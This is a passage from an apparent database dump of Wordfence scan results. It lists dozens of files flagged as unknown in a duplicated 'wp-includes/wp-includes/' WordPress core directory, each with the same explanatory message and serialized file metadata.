More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27653,1631424949,1631424949,'new','knownfile',75,'414123b260588254ff4663cbcb772245','05c21a2fea8738bca8f787d4e891114e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27654,1631424949,1631424949,'new','knownfile',75,'a9cf847c5cb3be580a83a226a224f108','9ac01d0b1b54c210895887ba365656fe','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27655,1631424949,1631424949,'new','knownfile',75,'622e6112c4837ac1c5363a35b59b7233','4cea3965801d41425c0f3b0220c7590b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27656,1631424949,1631424949,'new','knownfile',75,'035893ec5a2997350e53a09dd52ad37c','50e44f6c4c178a5087f85fd5fba3545f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27657,1631424949,1631424949,'new','knownfile',75,'821778629042c1e533fc4d3b4ddb3092','d09263905d6e5f02370a8641223998b9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27658,1631424949,1631424949,'new','knownfile',75,'a1e38a029962af675fb672c31480d6cc','563b7ce4fcb795f9a7376b482619f747','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27659,1631424950,1631424950,'new','knownfile',75,'25736c0ae1a97a5d6346cbc4a1fdb547','5df168570630d1c957472a721492d592','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27660,1631424950,1631424950,'new','knownfile',75,'3b43cd54394309e938f3c9f309956370','964fbd1d63e9337173cfd08503b01745','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core32/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27661,1631424950,1631424950,'new','knownfile',75,'ccdbc4002156b080aaff7070e71c4280','f958cb00444c2220017139993b34c317','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27662,1631424951,1631424951,'new','knownfile',75,'60472b312239dc36baf7d2f4cb6fd25f','bcdac32ecd65c4a7a17e43d3300fcfb8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27663,1631424951,1631424951,'new','knownfile',75,'a8f454abde3d33e60cbaaaf28c15d74a','a14f74187c0049da59e4dc5e29ff7a3e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27664,1631424951,1631424951,'new','knownfile',75,'a145ed818015a732ac343ae6e486fd90','7eff80c4cae4d3f94e20e5c69e2f38b7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27665,1631424951,1631424951,'new','knownfile',75,'2fda5c790c5f2e243fdba418ec2aafd3','671458811ca55ada8c68214ef84126a7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sodium_compat/src/Crypto32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27666,1631424952,1631424952,'new','knownfile',75,'338805946e3069a258cb962c01d11889','1684b3fb0b870345bd45a9313379306d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/src/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27667,1631424952,1631424952,'new','knownfile',75,'0a8342e75b9545f4d31fbe4e7ebb684d','523f32b05f684acab7421b62d75fcd58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27668,1631424952,1631424952,'new','knownfile',75,'c496a292944abff6405981e65d5fc306','78bfa79d41c905ab288d2c7b61f5a469','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/SodiumException.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/SodiumException.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27669,1631424952,1631424952,'new','knownfile',75,'4c6c89ec2447104b1072e9b5a30d46e5','765bc22e689eb8f36895414cceb955c0','Unknown file in WordPress core: wp-includes/wp-includes/spl-autoload-compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/spl-autoload-compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27670,1631424952,1631424952,'new','knownfile',75,'f5916775e0ffff562b4b27d1c675fc0f','c1bf86a375b8e03a354a18f266fc90a4','Unknown file in WordPress core: wp-includes/wp-includes/taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27671,1631424952,1631424952,'new','knownfile',75,'6ecc8dc5eec9890ed3723c23bfe502de','84448ec82eb5039f8fe1d5fe92234fc3','Unknown file in WordPress core: wp-includes/wp-includes/template-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/template-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27672,1631424952,1631424952,'new','knownfile',75,'52e793768eee5f73b8b5359f91260a58','1065f87808e9b29bc585e059481160af','Unknown file in WordPress core: wp-includes/wp-includes/template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27673,1631424952,1631424952,'new','knownfile',75,'a6342d31f853eb7e8893ef6b936fb16c','a9a379fdbfc07038304efb01221f3e35','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/theme-compat/comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27674,1631424952,1631424952,'new','knownfile',75,'63046dd74d8c43d3592a59a7c1203e45','2c6213678cd62ad01ee894c2e250cab0','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-404.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/theme-compat/embed-404.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27675,1631424952,1631424952,'new','knownfile',75,'ce1097740cce5271b02648cced338958','1b91d5ca9e61fe1b533e22ab2654f559','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-content.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/theme-compat/embed-content.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27676,1631424952,1631424952,'new','knownfile',75,'f981ab61b51da50d579a8009a85d97c0','297728c81ee00300910b857ff4d59c87','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/theme-compat/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27677,1631424952,1631424952,'new','knownfile',75,'ae7bf5d86704bd7fb44d6e081a067136','755a8094818f58efc132f453bf7f32ba','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/footer-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27678,1631424952,1631424952,'new','knownfile',75,'67ec43d031c24dd4b7891b1ba6326a88','9e854c0ecec98e3d1300e07784197b46','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/footer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27679,1631424952,1631424952,'new','knownfile',75,'6111f19e2ce59e81af9bf110e443dc8f','6d3b05dae5aef79e1ebf69ee0cc70851','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/header-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27680,1631424953,1631424953,'new','knownfile',75,'1b93f5bd5e023db4256fe6fed1862cf9','3a477fa8a4bdbc289d68989d9816a11a','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/header.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27681,1631424953,1631424953,'new','knownfile',75,'2aa0bf06dab2a8f5f22a90f15e3b17c3','fc7c04a474722ec20b47152901291d14','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/sidebar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/theme-compat/sidebar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27682,1631424953,1631424953,'new','knownfile',75,'c9b4301337909d4ab0d61844ef9c4328','4e487751a43ff9dc80d222e52a4d0ded','Unknown file in WordPress core: wp-includes/wp-includes/theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27683,1631424953,1631424953,'new','knownfile',75,'110db214bded87665b2383dcdc6ff1e1','879b7d1a31b8cfacdcf8bd7a6bae9e31','Unknown file in WordPress core: wp-includes/wp-includes/update.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/update.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27684,1631424953,1631424953,'new','knownfile',75,'a522f938a6fd75c5e29dee38bb838817','f63541cd28472e75e3dfa8717e1b7129','Unknown file in WordPress core: wp-includes/wp-includes/user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27685,1631424953,1631424953,'new','knownfile',75,'d1882d95b8069a2dee73034bca4a0cd0','8f3daac34569dcd0466733485d3f2468','Unknown file in WordPress core: wp-includes/wp-includes/vars.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/vars.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27686,1631424953,1631424953,'new','knownfile',75,'8d550b603afa12124b0330befa1e7575','17cad2d97eba7c113b522ae3e0384b8a','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27687,1631424953,1631424953,'new','knownfile',75,'a22481feb45e24d40eae87ae0de9666d','0511a9d2090836a9f8a622a68147066c','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-archives.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-archives.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27688,1631424953,1631424953,'new','knownfile',75,'c206a250d15557b9603c3928b9827a8a','e1df35fa8da86a8ed9cd7d9c2fdc7eef','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-calendar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-calendar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27689,1631424953,1631424953,'new','knownfile',75,'d87515f54076648893a1fdcac8fca8f7','016874bc5b661677ad4e2383a80e7658','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-categories.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/widgets/class-wp-widget-categories.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27690,1631424953,1631424953,'new','knownfile',75,'b013c87ed7c73c6990b4d9de1326dd09','dddb3cdfd338069f4651f4b8fdda1fc7','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27691,1631424954,1631424954,'new','knownfile',75,'dd85f6b869d5256e0e01a950a1d8d948','667225d36e3bf3b856aee5cc8868e754','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-links.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-links.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27692,1631424954,1631424954,'new','knownfile',75,'7dad97a2a10f71866bf550490331a7fa','ae101fb21ffddcde2018d215f020434b','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" 